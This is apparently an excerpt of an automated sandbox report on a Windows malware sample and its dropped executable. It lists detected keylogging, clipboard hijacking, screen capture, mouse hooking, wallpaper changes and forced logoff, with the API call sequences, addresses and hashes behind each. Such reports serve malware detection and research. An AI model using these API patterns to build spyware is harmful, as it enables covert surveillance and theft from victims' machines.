Source: Fj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	String found in binary or memory: https://www.geonames.org/
Source: N6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	String found in binary or memory: https://www.geonames.org/Timezone

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: [esc]	6_2_03D993F0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: [esc]	6_2_03D993F0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: [esc]	6_2_03D993F0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: [esc]	6_2_03D993F0

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03D86770 CreateMutexW,CreateMutexW,GetLastError,GetLastError,Sleep,Sleep,CreateMutexW,GetLastError,lstrlenW,lstrcmpW,_memset,lstrlenW,lstrcmpW,Sleep,GetModuleHandleW,GetConsoleWindow,Sleep,CreateMutexW,GetLastError,_memset,lstrlenW,lstrcmpW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,_memset,RegQueryValueExW,std::locale::_Init,std::_Lockit::_Lockit,_memmove,_memmove,_memmove,_memmove,GetDesktopWindow,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,GlobalUnlock,CloseClipboard,std::locale::_Init,std::_Lockit::_Lockit,_memmove,GetDesktopWindow,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

6_2_03D86770

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D86770 CreateMutexW,CreateMutexW,GetLastError,GetLastError,Sleep,Sleep,CreateMutexW,GetLastError,lstrlenW,lstrcmpW,_memset,lstrlenW,lstrcmpW,Sleep,GetModuleHandleW,GetConsoleWindow,Sleep,CreateMutexW,GetLastError,_memset,lstrlenW,lstrcmpW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,_memset,RegQueryValueExW,std::locale::_Init,std::_Lockit::_Lockit,_memmove,_memmove,_memmove,_memmove,GetDesktopWindow,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,GlobalUnlock,CloseClipboard,std::locale::_Init,std::_Lockit::_Lockit,_memmove,GetDesktopWindow,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		6_2_03D86770
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D871C6 _memset,lstrlenW,lstrcmpW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,_memset,RegQueryValueExW,std::locale::_Init,std::_Lockit::_Lockit,_memmove,GetDesktopWindow,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		6_2_03D871C6

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

6_2_03D86770

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03D96940 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,_memmove,DeleteObject,DeleteObject,ReleaseDC,_memmove,DeleteObject,DeleteObject,ReleaseDC,

6_2_03D96940

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03D99090 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,

6_2_03D99090

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

Jump to behavior

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3C8C7D ReleaseMutex,WriteProfileStringA,WriteProfileStringA,WriteProfileStringA,SystemParametersInfoA,		6_2_6C3C8C7D
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3C8C7D ReleaseMutex,WriteProfileStringA,WriteProfileStringA,WriteProfileStringA,SystemParametersInfoA,		7_2_6C3C8C7D

System Summary

Drops password protected ZIP file

Source: t3d.tmp.0.dr	Zip Entry: encrypted
Source: t3d.tmp.0.dr	Zip Entry: encrypted
Source: t3d.tmp.0.dr	Zip Entry: encrypted

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D96143 ExitWindowsEx,	6_2_03D96143
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D9611F ExitWindowsEx,	6_2_03D9611F
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D960FB ExitWindowsEx,	6_2_03D960FB

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_04290031	0_2_04290031
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_042964A6	0_2_042964A6
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_042A44D3	0_2_042A44D3
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_042A65B6	0_2_042A65B6
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_04296E41	0_2_04296E41
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_042A4F78	0_2_042A4F78
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_0429B904	0_2_0429B904
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_042A4A24	0_2_042A4A24
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_10005CA2	0_2_10005CA2
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_1000839B	0_2_1000839B
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_100064A2	0_2_100064A2
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_100144CF	0_2_100144CF
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_1000B900	0_2_1000B900
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_100165B2	0_2_100165B2
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_10014A20	0_2_10014A20
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_10006E3D	0_2_10006E3D
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_10014F74	0_2_10014F74
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02F12EA1	6_2_02F12EA1
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02F0B77B	6_2_02F0B77B
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02F11F6C	6_2_02F11F6C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02F1133F	6_2_02F1133F
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02F024B0	6_2_02F024B0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02F11890	6_2_02F11890
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02F10DEE	6_2_02F10DEE
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D883E0	6_2_03D883E0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D88150	6_2_03D88150
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D9EB96	6_2_03D9EB96
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DA9AD5	6_2_03DA9AD5
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DAE2AC	6_2_03DAE2AC
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D939A0	6_2_03D939A0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D9E7C4	6_2_03D9E7C4
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DAE7FD	6_2_03DAE7FD
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D9DF91	6_2_03D9DF91
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D9EF7E	6_2_03D9EF7E
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DAED4E	6_2_03DAED4E
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D82500	6_2_03D82500
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D9B490	6_2_03D9B490
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DB040C	6_2_03DB040C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DAF42A	6_2_03DAF42A
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D9E426	6_2_03D9E426
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C395835	6_2_6C395835
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C351112	6_2_6C351112
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3F1CD1	6_2_6C3F1CD1
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3D9CC5	6_2_6C3D9CC5
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C359CCA	6_2_6C359CCA
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C36CD32	6_2_6C36CD32
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3B9D7B	6_2_6C3B9D7B
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3CBD48	6_2_6C3CBD48
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3E6D46	6_2_6C3E6D46
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3ADD8F	6_2_6C3ADD8F
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3AEDF5	6_2_6C3AEDF5
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C39BDD0	6_2_6C39BDD0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3C9E12	6_2_6C3C9E12
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3F8E6E	6_2_6C3F8E6E
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C358E60	6_2_6C358E60
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3C3E4C	6_2_6C3C3E4C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C36AED7	6_2_6C36AED7
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C36DF3F	6_2_6C36DF3F
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3E7F37	6_2_6C3E7F37
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C36BFD7	6_2_6C36BFD7
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C36387C	6_2_6C36387C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3F1933	6_2_6C3F1933
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C376973	6_2_6C376973
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3D5990	6_2_6C3D5990
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3909DA	6_2_6C3909DA
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3DB9D7	6_2_6C3DB9D7
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3D99C6	6_2_6C3D99C6
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3DCAA5	6_2_6C3DCAA5
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C365BBD	6_2_6C365BBD
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C367BAA	6_2_6C367BAA
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C35EBF4	6_2_6C35EBF4
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3C0BCC	6_2_6C3C0BCC
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C35B41A	6_2_6C35B41A
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3F149E	6_2_6C3F149E
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3F248B	6_2_6C3F248B
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3EB503	6_2_6C3EB503
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C364544	6_2_6C364544
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3805B3	6_2_6C3805B3
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3C86B7	6_2_6C3C86B7
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3C4698	6_2_6C3C4698
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C365698	6_2_6C365698
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C398689	6_2_6C398689
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3CF6C9	6_2_6C3CF6C9
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C39D768	6_2_6C39D768
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3D974B	6_2_6C3D974B
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3E67F5	6_2_6C3E67F5
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3C2025	6_2_6C3C2025
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3C7003	6_2_6C3C7003
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3BB07C	6_2_6C3BB07C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3F20A3	6_2_6C3F20A3
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C37E0D8	6_2_6C37E0D8
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3AA192	6_2_6C3AA192
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C35E1C8	6_2_6C35E1C8
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C358279	6_2_6C358279
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3D026A	6_2_6C3D026A
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3B3266	6_2_6C3B3266
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3682B2	6_2_6C3682B2
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3E62A6	6_2_6C3E62A6
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3B62E8	6_2_6C3B62E8
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3F42E1	6_2_6C3F42E1
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3BF32A	6_2_6C3BF32A
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C356374	6_2_6C356374
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3C8368	6_2_6C3C8368
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3BE35C	6_2_6C3BE35C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3BC38C	6_2_6C3BC38C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C38A386	6_2_6C38A386
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3F93C9	6_2_6C3F93C9
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_032C125D	6_2_032C125D
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_032BB148	6_2_032BB148
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_032C286E	6_2_032C286E
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_032C07BB	6_2_032C07BB
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_032B1E7D	6_2_032B1E7D
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_032C0D0C	6_2_032C0D0C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03C0335F	6_2_03C0335F
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03BF7B0F	6_2_03BF7B0F
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C395835	7_2_6C395835
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C351112	7_2_6C351112
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3F1CD1	7_2_6C3F1CD1
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3D9CC5	7_2_6C3D9CC5
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C359CCA	7_2_6C359CCA
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C36CD32	7_2_6C36CD32
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3B9D7B	7_2_6C3B9D7B
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3CBD48	7_2_6C3CBD48
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3E6D46	7_2_6C3E6D46
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3ADD8F	7_2_6C3ADD8F
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3AEDF5	7_2_6C3AEDF5
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C39BDD0	7_2_6C39BDD0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3C9E12	7_2_6C3C9E12
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3F8E6E	7_2_6C3F8E6E
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C358E60	7_2_6C358E60
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3C3E4C	7_2_6C3C3E4C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C36AED7	7_2_6C36AED7
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C36DF3F	7_2_6C36DF3F
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3E7F37	7_2_6C3E7F37
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C36BFD7	7_2_6C36BFD7
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C36387C	7_2_6C36387C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3F1933	7_2_6C3F1933
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C376973	7_2_6C376973
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3D5990	7_2_6C3D5990
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3909DA	7_2_6C3909DA
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3DB9D7	7_2_6C3DB9D7
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3D99C6	7_2_6C3D99C6
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3DCAA5	7_2_6C3DCAA5
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C365BBD	7_2_6C365BBD
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C367BAA	7_2_6C367BAA
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C35EBF4	7_2_6C35EBF4
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3C0BCC	7_2_6C3C0BCC
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C35B41A	7_2_6C35B41A
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3F149E	7_2_6C3F149E
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3F248B	7_2_6C3F248B
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3EB503	7_2_6C3EB503
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C364544	7_2_6C364544
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3805B3	7_2_6C3805B3
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3C86B7	7_2_6C3C86B7
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3C4698	7_2_6C3C4698
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C365698	7_2_6C365698
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C398689	7_2_6C398689
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3CF6C9	7_2_6C3CF6C9
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C39D768	7_2_6C39D768
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3D974B	7_2_6C3D974B
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3E67F5	7_2_6C3E67F5
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3C2025	7_2_6C3C2025
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3C7003	7_2_6C3C7003
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3BB07C	7_2_6C3BB07C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3F20A3	7_2_6C3F20A3
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C37E0D8	7_2_6C37E0D8
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3AA192	7_2_6C3AA192
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C35E1C8	7_2_6C35E1C8
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C358279	7_2_6C358279
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3D026A	7_2_6C3D026A
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3B3266	7_2_6C3B3266
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3682B2	7_2_6C3682B2
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3E62A6	7_2_6C3E62A6
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3B62E8	7_2_6C3B62E8
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3F42E1	7_2_6C3F42E1
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3BF32A	7_2_6C3BF32A
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C356374	7_2_6C356374
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3C8368	7_2_6C3C8368
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3BE35C	7_2_6C3BE35C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3BC38C	7_2_6C3BC38C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C38A386	7_2_6C38A386
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3F93C9	7_2_6C3F93C9

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe E528455778D952ACFC5B330B378F2C53CC92E55CFEAB1C1E1DBB52E01D626BB4
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\IemFNe\MSVCP140.dll 885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 6C35C822 appears 40 times
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 03DA2EF0 appears 33 times
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 6C35CB4D appears 878 times
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 6C3D7ECE appears 72 times
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 6C3D1F84 appears 938 times
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 6C3D9165 appears 42 times
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 6C3714FC appears 136 times
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 6C3D3864 appears 346 times
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 6C3E9148 appears 46 times
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 6C372962 appears 66 times
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 6C3D7820 appears 146 times
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: String function: 6C3D23D3 appears 38 times

Source: N6xnw0iEGs.exe

Static PE information: Resource name: BIN type: PE32 executable (console) Intel 80386, for MS Windows

Source: N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNetDiagnotor.exe4 vs N6xnw0iEGs.exe
